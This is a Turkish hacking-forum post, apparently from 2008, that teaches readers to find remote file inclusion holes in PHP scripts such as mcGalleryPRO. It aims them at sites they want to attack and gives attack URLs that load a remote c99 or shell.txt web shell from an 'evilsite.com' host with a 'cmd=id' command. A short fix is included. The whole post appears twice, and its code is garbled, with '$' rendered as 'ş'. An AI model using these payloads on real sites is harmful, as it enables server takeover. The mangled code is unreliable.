- 4 Nis 2008
- 24
- 1
S.a // Arkadaşlar Rfi Açığını Bulma SizLerLe Paylaşmak İstedim Umarım Faydalı Olur...
Hep Hazır Rfi Açıkları ile hackler yaptınız .. artık açıklar bulamıyorsunuz veya belirli bir script e saldırmak istiyorsunuz ama açık bilmiyorsunuz ve o script in Rfi açığını çıkmasını bekliyorsunuz ; Birde Bekleyemeyenler vardır bu konu Sizler için ...
Hedef Script in açığını Siz Bulun !
----------------------------------------------------------------------------------------------------
Öncelikle Hedef Sitenin Script ini öğreniyorsunuz ( Joomla , mambo , vs vs farklı scriptler =
Sonra Script i indirdiniz not defterinlen açıp (professionel not defteri daha uygun)
"require"
"include"
"include_once"
"require_once"
"Define"
kodlarını arıyorsunuz ...
neyse aradınız örnek veriyorum
/include/config.inc.php
de
include(şlvc_include_dir.’lang/english.inc.php’;
bu kodu buldunuz hımm diyorsunuz denemek lazım sonra
bunu düzenliyorsunuz.
/include/config.inc.php?lvc_include_dir
diğer örnek
include ("şchemin/moteur/moteur_form.php";
include ("şchemin/moteur/moteur_tab_results.php";
düzenlenmiş hali sitenin sonuna bunu yapıştırıyorsunuz..
http://www.site.com/path/moteur.php?...=http://siteniz.com/c99.txt?
-------------------------------------------------------------------------------------------------------
2. ANLATIM :
RFI Açığı Arama
Hacker’ların RFI açığı ararken dikkat ettikleri başlıca parametreleri şöyle sıralayabiliriz;
- İnclude
- Require
- Define
Bu yönergelerin kullanımı sırasında "ş" tanım işareti ile kullanılan parametreler yardımıyla uzaktan kod çağırılabiliyor.
Örnek olarak aşağıdaki kodu ele alalım:
Kod:include ("şpath_to_folder/admin/common.php" );
include ("şpath_to_folder/lang/şlang_def" );
yukarıdaki kodlar mcGalleryPRO scriptinden alınmıştır.kurulum paketindeki random2.php dosyasındaki hatalı kodlamadan dolayı uzaktan dosya çağırmak mümkündür.şimdi burda başında ş işareti olan parametrelere dikkatinizi çekmek istiyorum.
path_to_folder ve lang_def... ilk parametreyi kullanarak rfi yapılabilmektedir.nedeni bu değişkenin daha önce sabit bir değere eşitlenmemiş olmasıdır.dolayısıyla bu değişkene atıyacağınız her hangi bir değer onun değerini belirler.
bu kodla örnek rfi yi oluşturalım :
http://www.victimsite.com/mcGalleryP...dom2.php?path_ to_folder=http://evilsite.com/shell.txt?cmd=id
Bu şekilde bir Rfi’nin varsayılan ayarlarda bir değişiklik yapılmamışsa çalışması beklenir.
Peki aynı şey lang_def için mümkün müdür? Tabii ki hayır... Çünkü dikkatinizi çektiyse lang_def değişkeninden önce sırada /lang klasörü vardır.Eğer siz;
color=#0000ffhttp://www.victimsite.com/mcGalleryPR O_dir/rand om2.php?lang_def=http://evilsite.com/shell.txt?cmd =id
...şeklinde bir rfi yapmak isterseniz;bu kodu çağırdığınızda gezgininiz /lang klasörün altında çağıracağınız kodu arar.şimdi ilk değişkenimize geri dönelim..
gördüğünüz gibi bu bir açık yani "bug" dır.peki kapatılması mümkün mü?Elbette..
örnek olarak bir fixing yapalım:
Kod:şpath_to_folder = "./" ;
Kod:include ("şpath_to_folder/admin/common.php" );
include ("şpath_to_folder/lang/şlang_def" );
Basit olarak random2.php dosyasının böyle kodlandığını varsayarsak rfi yapamayacağımızı görürüz.çünkü path_to_folder değişkenine bir değer atanmış ve çağırılmak istenen dosyanın ./ yani public_html ya da httpdocs gibi sitenin root klasöründe aranması işaret edilmiştir.
====Alıntıdır...====
Hep Hazır Rfi Açıkları ile hackler yaptınız .. artık açıklar bulamıyorsunuz veya belirli bir script e saldırmak istiyorsunuz ama açık bilmiyorsunuz ve o script in Rfi açığını çıkmasını bekliyorsunuz ; Birde Bekleyemeyenler vardır bu konu Sizler için ...
Hedef Script in açığını Siz Bulun !
----------------------------------------------------------------------------------------------------
Öncelikle Hedef Sitenin Script ini öğreniyorsunuz ( Joomla , mambo , vs vs farklı scriptler =
Sonra Script i indirdiniz not defterinlen açıp (professionel not defteri daha uygun)
"require"
"include"
"include_once"
"require_once"
"Define"
kodlarını arıyorsunuz ...
neyse aradınız örnek veriyorum
/include/config.inc.php
de
include(şlvc_include_dir.’lang/english.inc.php’;
bu kodu buldunuz hımm diyorsunuz denemek lazım sonra
bunu düzenliyorsunuz.
/include/config.inc.php?lvc_include_dir
diğer örnek
include ("şchemin/moteur/moteur_form.php";
include ("şchemin/moteur/moteur_tab_results.php";
düzenlenmiş hali sitenin sonuna bunu yapıştırıyorsunuz..
http://www.site.com/path/moteur.php?...=http://siteniz.com/c99.txt?
-------------------------------------------------------------------------------------------------------
2. ANLATIM :
RFI Açığı Arama
Hacker’ların RFI açığı ararken dikkat ettikleri başlıca parametreleri şöyle sıralayabiliriz;
- İnclude
- Require
- Define
Bu yönergelerin kullanımı sırasında "ş" tanım işareti ile kullanılan parametreler yardımıyla uzaktan kod çağırılabiliyor.
Örnek olarak aşağıdaki kodu ele alalım:
Kod:include ("şpath_to_folder/admin/common.php" );
include ("şpath_to_folder/lang/şlang_def" );
yukarıdaki kodlar mcGalleryPRO scriptinden alınmıştır.kurulum paketindeki random2.php dosyasındaki hatalı kodlamadan dolayı uzaktan dosya çağırmak mümkündür.şimdi burda başında ş işareti olan parametrelere dikkatinizi çekmek istiyorum.
path_to_folder ve lang_def... ilk parametreyi kullanarak rfi yapılabilmektedir.nedeni bu değişkenin daha önce sabit bir değere eşitlenmemiş olmasıdır.dolayısıyla bu değişkene atıyacağınız her hangi bir değer onun değerini belirler.
bu kodla örnek rfi yi oluşturalım :
http://www.victimsite.com/mcGalleryP...dom2.php?path_ to_folder=http://evilsite.com/shell.txt?cmd=id
Bu şekilde bir Rfi’nin varsayılan ayarlarda bir değişiklik yapılmamışsa çalışması beklenir.
Peki aynı şey lang_def için mümkün müdür? Tabii ki hayır... Çünkü dikkatinizi çektiyse lang_def değişkeninden önce sırada /lang klasörü vardır.Eğer siz;
color=#0000ffhttp://www.victimsite.com/mcGalleryPR O_dir/rand om2.php?lang_def=http://evilsite.com/shell.txt?cmd =id
...şeklinde bir rfi yapmak isterseniz;bu kodu çağırdığınızda gezgininiz /lang klasörün altında çağıracağınız kodu arar.şimdi ilk değişkenimize geri dönelim..
gördüğünüz gibi bu bir açık yani "bug" dır.peki kapatılması mümkün mü?Elbette..
örnek olarak bir fixing yapalım:
Kod:şpath_to_folder = "./" ;
Kod:include ("şpath_to_folder/admin/common.php" );
include ("şpath_to_folder/lang/şlang_def" );
Basit olarak random2.php dosyasının böyle kodlandığını varsayarsak rfi yapamayacağımızı görürüz.çünkü path_to_folder değişkenine bir değer atanmış ve çağırılmak istenen dosyanın ./ yani public_html ya da httpdocs gibi sitenin root klasöründe aranması işaret edilmiştir.
====Alıntıdır...====
Son düzenleme: